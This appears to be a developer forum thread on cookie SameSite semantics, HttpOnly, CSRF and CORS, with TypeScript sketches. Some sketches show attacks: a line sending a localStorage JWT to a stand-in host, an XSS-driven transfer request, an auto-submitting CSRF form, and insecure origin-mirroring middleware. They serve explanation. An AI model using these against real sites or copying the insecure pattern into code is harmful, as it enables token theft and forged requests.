> It is good practice to always use the SameSite directive with cookies as this provides protection against CSRF attacks.
Be careful with assuming SameSite fully protects from CSRF attacks. I thought it did, but then I read what "site" actually refers to in the context of SameSite (eTLD+1).
If the eTLD+1 (i.e. company.com) is not listed on the Public Suffix List, even SameSite=Strict cookies for a.company.com will still be sent for requests initiated from b.company.com.
I believe originally (back in the early drafts of the spec) the concept of a "site" was significantly stricter (based on the origins matching), but it got watered down which was a real shame. I'm not sure why.
> If "document" is a first-party context, and "request"'s URI's origin is the same as the origin of the URI of the active document in the top-level browsing context of "document", then return "First-Party".
vs. (draft 3)
> A document is considered a "first-party context" if and only if the registerable domain of the origin of its URI is the same as the registerable domain of the first-party origin, and if each of the active documents in its ancestors' browsing contexts' is a first-party context.
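To make the eTLD+1 point concrete, here is a minimal sketch in TypeScript of what "same site" actually compares. It assumes the "psl" npm package as the Public Suffix List lookup; any PSL implementation would do:

    import psl from "psl";

    // Two hosts are "same site" when their registrable domain (eTLD+1) matches.
    function isSameSite(hostA: string, hostB: string): boolean {
      const a = psl.get(hostA); // e.g. "company.com" for "a.company.com"
      const b = psl.get(hostB);
      return a !== null && a === b;
    }

    // company.com is not a public suffix, so its subdomains are same-site:
    // a SameSite=Strict cookie for a.company.com is still sent on requests
    // initiated from b.company.com.
    console.log(isSameSite("a.company.com", "b.company.com")); // true

    // github.io IS on the Public Suffix List, so these are cross-site:
    console.log(isSameSite("a.github.io", "b.github.io")); // false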
> but it got watered down which was a real shame. I'm not sure why.
I think (and this might just be an old wives' tale) it was related to the browser connection limits being per domain, and so subdomains + looser cookie origins were a band-aid for it.
Cookies work when JavaScript is disabled or has failed to load (your basic functionality should work without it); localStorage doesn't. So unless we are talking about SPAs, cookies are generally the better choice.
The sole reason really is that the contents of an HttpOnly cookie cannot be exfiltrated by an XSS exploit, while a JWT stored in localStorage could be.
This would probably only make a difference if the JWT either has a long lifetime, or is usable outside of the site's origin.
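A minimal browser-side sketch of that difference (the /login response, "jwt" key, and evil.example host are made-up names): the HttpOnly cookie is invisible to page scripts, while anything in localStorage is readable by any script that runs on the page, including an injected one.

    // Server side sets: Set-Cookie: session=opaque-id; HttpOnly; Secure; SameSite=Lax; Path=/
    // Page scripts (and therefore XSS payloads) cannot read it:
    console.log(document.cookie); // the HttpOnly session cookie never shows up here

    // A JWT kept in localStorage has no such protection; an injected script can
    // simply read and exfiltrate it:
    const jwt = localStorage.getItem("jwt");
    if (jwt !== null) {
      void fetch("https://evil.example/steal?t=" + encodeURIComponent(jwt));
    }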
Other than the security implications of HttpOnly (and what it means for XSS), it's also convenience: cookies work well for small values you want to send with every request anyway, such as session ids of logged-in users and other forms of access tokens[0]. Your frontend code does not have to keep track of such values itself in localStorage (and maintain things like expiration), and it does not have to manually stuff them into each request, and so on.
localStorage and IndexedDB, on the other hand, are most useful for frontend-only stuff that the server doesn't ever need to see, for large chunks of data that you do not want to send with every request, and for app-domain-specific caches that would be awkward to implement using regular browser caches or ServiceWorkers.
[0] For example, Cloudflare implements their "browser checks" anti-DDoS protection by setting a token in a cookie so your browser isn't hit with that check page on every navigation (at least in theory; Tor users and a lot of VPN users have different experiences). Since the browser will automatically manage and maintain such a cookie, the actual websites behind Cloudflare do not need any changes whatsoever to their code.
Cookies are sent with the first request, so the site can customize the response based on user ID. If the site uses localStorage to identify the user, it will first have to send some bootstrap page which loads the id and sends it back. Much more cumbersome.
I think 1 is the only real argument. 2 seems less and less relevant with HSTS.
I suppose the other thing you can do with cookies is use cookie prefixes. __Host- probably makes no sense in the context of localStorage/sessionStorage anyway though, since those are already tied to the exact origin.
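For reference, a sketch of what a __Host- prefixed cookie looks like (the session value is a placeholder): browsers only accept the prefix when the cookie is Secure, has Path=/, and carries no Domain attribute, which keeps it bound to the exact host that set it.

    import { createServer } from "node:http";

    createServer((_req, res) => {
      // __Host- requires Secure, Path=/, and no Domain attribute.
      res.setHeader(
        "Set-Cookie",
        "__Host-session=opaque-id; Secure; HttpOnly; Path=/; SameSite=Strict"
      );
      res.end("ok");
    }).listen(8443);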
Having HttpOnly set only buys you so much, too. Sure, the injected code can't steal the session from an XSS vector, but it can still do AJAX requests as the victim, potentially set up a JavaScript shell that works whilst the tab is open, and so on.
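To illustrate, a sketch of what an injected script can still do when the session cookie is HttpOnly (/api/transfer is a made-up endpoint): the payload never sees the cookie, but the browser attaches it to any request the payload makes from the victim origin.

    // Runs in the victim's page via an XSS vector.
    async function actAsVictim(): Promise<void> {
      const res = await fetch("/api/transfer", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ to: "attacker", amount: 100 }),
        // Same-origin requests send cookies by default, HttpOnly or not.
      });
      // Because this runs on the victim origin, the response is readable too.
      console.log(res.status, await res.text());
    }
    void actAsVictim();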
Great overview with a minor nit-pick; it's Cross-Origin Resource Sharing rather than Request Sharing. It describes a server's willingness to share its resources across origins. The client's request isn't the thing being shared.
"It is good practice to always use the SameSite directive with cookies as this provides protection against CSRF attacks."
"As an added bonus, many of the mitigations on this page can be applied at the proxy server (CSP, HSTS, HPKP) or network level (better server proxying to remove the need for CORS), and only the CSRF and XSS protections really need to be added to the application."
If I add a line to the localhost-bound forward proxy that the application uses so that "SameSite" is added to every cookie, then it appears the second statement is misleading.
As a user, I rely on a (forward) proxy. Much easier for me to focus on the proxy than trying to make sure every application^1 is doing the right things.
Both parties to an HTTP transaction can use proxies to execute mitigations. And as the author states, the ones he is mentioning are only some of the possibilities.
1. Especially ones that we do not compile from source and are distributed by "tech" companies that rely on online advertising as their main source of revenue. We users are not their customers, we are the guinea pigs.
> Note that CORS preflight requests are not made for GET HEAD POST requests with default headers.
I really wish the author had included an explanation for this. What are "default headers"? What special header(s) need to be present on the request in order for a preflight request to be made?
For your specific question, this is the relevant section of the above link (a short fetch sketch follows the excerpt):
----
Apart from the headers automatically set by the user agent (for example, Connection, User-Agent, or the other headers defined in the Fetch spec as a “forbidden header name”), the only headers which are allowed to be manually set are those which the Fetch spec defines as a “CORS-safelisted request-header”, which are:
Accept
Accept-Language
Content-Language
Content-Type (but note the additional requirements below)
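As a rough illustration (https://api.example.com is a placeholder cross-origin endpoint): a GET with only safelisted headers goes out directly, while adding a non-safelisted header makes the browser send an OPTIONS preflight first.

    // "Simple" request: GET with only CORS-safelisted headers, no preflight.
    void fetch("https://api.example.com/items", {
      headers: { Accept: "application/json" },
    });

    // Preflighted request: Authorization is not a safelisted header, so the
    // browser first sends OPTIONS /items with Access-Control-Request-Method
    // and Access-Control-Request-Headers, and only proceeds if allowed.
    void fetch("https://api.example.com/items", {
      headers: { Authorization: "Bearer <token>" },
    });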
As I understand it, the main purpose of CORS is to prevent information from being leaked by domains other than the current one using JavaScript, since the browser will always send those domains' cookies in all requests. In that case, why doesn't JavaScript have a method of sending a request without any cookies? Would it still somehow be vulnerable to CSRF attacks? Is there simply no demand for the feature? Are there other issues with the concept that I don't know about? (The main context of this is from an attempt to create a client-side JavaScript application which calls a certain public API, which turned out to be impossible since it did not implement CORS headers.)
I totally agree with you. That said, there are people who disagree with both of us and believe it is reasonable for people to use IP-address-based authorization schemes--which, for the avoidance of doubt, might simply be "I am behind a firewall (but all the IP addresses behind my firewall are public addresses, and so cannot be disallowed for this purpose by IETF CIDR)"--and so they keep insisting that you should not be able to use a script on a website to "port scan" behind someone's firewall and attack their other half-protected file servers, computers, and printers. This is why a mechanism actually does exist to say "send a request without cookies"... but it is only for a GET and, this being the key limitation, the script isn't allowed to see the value of what was returned or even whether it succeeded or failed (although I can't for the life of me find any documentation on this right now, despite swearing I was trying to use this just last week before running into the response body limitation). Otherwise, this whole thing always feels like some half-assed attempt at DRM :/.
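For what it's worth, fetch does expose two related knobs, though neither fully solves the problem: credentials: "omit" sends a request without cookies but reading the response still requires CORS headers from the server, and mode: "no-cors" (possibly the mechanism described above, though it is not limited to GET) lets the request go out but returns an opaque response. A sketch, with https://api.example.com as a placeholder:

    async function probe(): Promise<void> {
      // credentials: "omit" sends the request without cookies, but reading the
      // response still requires the server to opt in via Access-Control-Allow-Origin.
      await fetch("https://api.example.com/data", { credentials: "omit" });

      // mode: "no-cors": the request goes out, but the result is opaque.
      const res = await fetch("https://api.example.com/data", { mode: "no-cors" });
      console.log(res.type);   // "opaque"
      console.log(res.status); // 0 - success or failure is not observable
    }
    void probe();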
> The reason access-control-allow-origin cannot be '*' when access-control-allow-credentials is set is to prevent developers taking the shortcut of adding a * and then forgetting about it altogether - this behaviour forces developers to think about how their API is going to be consumed.
Instead developers take the shortcut of creating middleware that captures the Origin header in the request and mirrors it into the response, effectively creating the same insecure ruleset.
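Roughly the anti-pattern being described, as an Express-style middleware sketch (Express itself is an assumption; nothing here prescribes a framework): mirroring the Origin header back while allowing credentials effectively allowlists every site on the web.

    import express from "express";

    const app = express();

    // Insecure: whatever Origin the browser sends is echoed back, so any
    // attacker-controlled page can make credentialed requests and read responses.
    app.use((req, res, next) => {
      const origin = req.headers.origin;
      if (origin) {
        res.setHeader("Access-Control-Allow-Origin", origin);
        res.setHeader("Access-Control-Allow-Credentials", "true");
      }
      next();
    });

    app.listen(3000);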
This is good information, and I'd love to see a write-up of how Firefox, Chrome, Brave and other browsers can be set up to prevent some of this.
For example, Firefox has both first-party isolation mode and now Total Cookie Protection, which isolates cookies and would thus likely prevent CSRF. However, I think first-party isolation causes CORS issues, like when trying to pay with PayPal on another retail site.
> which isolates cookies and would thus likely prevent CSRF
CSRF is often done via redirecting you or submitting a form, both of which obviously completely bypass FPI and dFPI (i.e. the cookie part of Total Cookie Protection).
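For anyone wondering how that works mechanically, a sketch of the form-submission vector (bank.example is a placeholder target). The attacker never reads a response; the harm is the request itself, sent as a top-level navigation that carries the target's own first-party cookies, which is why cookie partitioning doesn't help and SameSite/CSRF tokens are the actual defences.

    // Runs on the attacker's page.
    const form = document.createElement("form");
    form.method = "POST";
    form.action = "https://bank.example/transfer";

    const to = document.createElement("input");
    to.type = "hidden";
    to.name = "to";
    to.value = "attacker";
    form.appendChild(to);

    document.body.appendChild(form);
    form.submit(); // top-level navigation: the bank's cookies ride along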
> I'd love to see a write-up of how Firefox, Chrome, Brave and other browsers can be set up to prevent some of this.
I only use Firefox; you'll have to find information elsewhere for other browsers.
CSRF, XSS, Set-Cookie
These need to be fixed server-side; there is little to nothing you can do as the client. CSRF and XSS represent straight-up vulnerabilities in the website. Report to the developer and/or stop using the vulnerable website.
You can achieve the same effect of whitelisting 3rd parties by using an extension such as uBlock Origin or uMatrix (warning: no longer in development) in default-deny mode.
HPKP
Nobody uses this nowadays. Only semi-related, but you can turn on mandatory revocation checking (security.OCSP.require).
Referrer-Policy
network.http.referer.XOriginPolicy
0=always (default), 1=only if base domains match, 2=only if hosts match
network.http.referer.XOriginTrimmingPolicy
0=send full URI (default), 1=scheme+host+port+path, 2=scheme+host+port
These apply only to cross-origin requests but that's probably where you care about the referer. Note that the website's Referrer-Policy might override these, I haven't tested that.
Trying to demystify CORS in a couple of paragraphs... good luck with that! I think a 200-page book would still be too short to demystify it. It's a crazy topic.
I never understood the difficulty with CORS. It's dirt simple: don't send requests across domain names. And if you do, make sure you return header(s) from the target resource to specifically allow the origin to request it.
All the difficulty seems to be people trying to do crazy, esoteric things there's no good reason to be doing in the first place.
There's a lot of arcana that you're skipping over. It's easy to get CORS partially working on your development machine only to watch it fail in production, or only fail on certain browsers or certain ports. There are silly things that need to happen if your application receives traffic from multiple domains. Our CORS middleware is ~100 LOC.
What?! For responding to OPTIONS requests and setting the right header on responses from your backend?
I don't really see the problems you're citing as being caused by "complexity in CORS" either, but more by not having a proper development setup or similar. CORS is specifically about domains. As long as you set the frontend domain as the accepted origin in your responses from the backend (and respond to OPTIONS), you're good to go.
But what does that have to do with CORS? If you're just writing the client-side code (what runs in the browser), then you have no control over 3rd party origins, hence either you can use their API or not. Unless you write your own backend also, and then supporting CORS is trivial.
Why do you need to run that on the client? And even if you do need to run it on the client for some reason, GitHub has APIs that you could use which have an allow-all CORS policy (as all APIs do).
CORS is defending against a particular class of attack, which is indistinguishable from the scenario you outlined: evilexample.com wants to get access to your private repos on GitHub (which can be reached purely through GET requests).
The post I was replying to seemed to be saying that invoking multiple services from the client is "a sign of how ludicrous front end development has gotten."
> Why do you need to run that on the client?
Because it's a good idea (less wasteful) to do that on the client. Rather than wasting bandwidth rerouting it via my own server.
You're correct, it's not a list. A browser will send an Origin header during the OPTIONS preflight that the server can check and then return back that value in an Access-Control-Allow-Origin response header, or it can return * without any checks if e.g. it's a public API endpoint anyway and expected to be hit by fetch/XHR traffic from all kinds of places.
Non-browser clients (and browsers, for non-CORS and/or "simple" requests) will not usually send any CORS headers or preflight requests, so you should account for that when building a web API. Non-browser clients can of course just fake any browser header and request they want, so the Access-Control headers are NOT a substitute for real access control/authentication.
Yep, that's correct. Only a single origin is supported. The implementation on the backend server/proxy may use a lookup list, and return the specified origin if that exists in the list. As called out in the post too, * is a valid one (as is null) but is not recommended.
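A minimal sketch of that lookup-list approach (Node.js + TypeScript, hypothetical origins), including the OPTIONS preflight handling mentioned upthread:

    import { createServer } from "node:http";

    const allowedOrigins = new Set([
      "https://app.example.com",
      "https://admin.example.com",
    ]);

    createServer((req, res) => {
      const origin = req.headers.origin;
      // Only echo the origin back if it is on the allowlist.
      if (origin && allowedOrigins.has(origin)) {
        res.setHeader("Access-Control-Allow-Origin", origin);
        res.setHeader("Vary", "Origin"); // caches must not reuse across origins
        res.setHeader("Access-Control-Allow-Credentials", "true");
      }
      if (req.method === "OPTIONS") {
        // Preflight response: state which methods/headers real requests may use.
        res.setHeader("Access-Control-Allow-Methods", "GET, POST, OPTIONS");
        res.setHeader("Access-Control-Allow-Headers", "Content-Type, Authorization");
        res.writeHead(204);
        res.end();
        return;
      }
      res.end(JSON.stringify({ ok: true }));
    }).listen(8080);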
"Note that CORS preflight requests are not made for GET HEAD POST requests with default headers."
What are these "default" headers? I have seen access-control-allow-* response headers when making HTTP requests. I do not send unnecessary headers. Perhaps some of the ones I do not send are considered "default".
"Thus CORS is a way of selectively loosening security not of tightening it."
Proxy config I use scrubs all CORS headers. As the author states, CORS is irrelevant outside the browser. I make most HTTP requests outside the ("modern") browser anyway.
"Overall, as the web grows in terms of features and complexity, the attack surface also grows correspondingly large."
Job security for some people, I guess.
Apparently there is insufficient incentive to simplify things (by subtraction, not addition).
As well as a system you can use to evaluate your site: https://observatory.mozilla.org/